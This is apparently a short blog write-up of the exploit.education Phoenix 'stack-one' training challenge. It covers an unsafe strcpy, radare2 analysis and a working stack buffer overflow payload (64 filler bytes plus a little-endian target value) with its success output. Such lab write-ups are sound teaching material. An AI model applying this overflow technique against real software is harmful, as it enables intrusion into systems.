02 February 2019

Stack 1

Write-up for: Stack One

I will omit the source code from now on. All future challenges will be approached from a black box perspective first to improve reversing skills. Also the source is available online (if exploit.education is down try wayback archive)

https://exploit.education/phoenix/stack-one/

This challenge is very similar to the previous one, it only requires a bit more precision in overflowing the buffer since a specific value is expected.

In this challenge, data is read via strcpy, using the first command line parameter as input. This call is unsafe and leads to a stack buffer overflow.

  strcpy(locals.buffer, argv[1]);

Binary analysis

We can start off by looking at the binary using radare2:

radare2 stack-one
aa # analyze everything
s main
pD @ main

...
specify an argument, to be copied into the "buffer"" @ 0x804863c
...
ng_closer__changeme_is_currently_0x_08x__we_want_0x496c5962_n
...

Judging from these strings we can pass an argument to copy to a buffer. The is a variable called changeme which needs to be of a certain value. Going from here, we would try to determine the length of the buffer. Various options exist: static analysis / RE, probing the binary or debugging it.

Since this is a very simple binary, let’s skip the further analysis details.

The exploit:

user@phoenix-amd64:/opt/phoenix/i486$ ./stack-one `python -c 'print "A"*64 + "\x62\x59\x6c\x49"' `

Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value

Note that the bytes in the payload are reversed to what we saw in the string due to the little-endian nature of the system.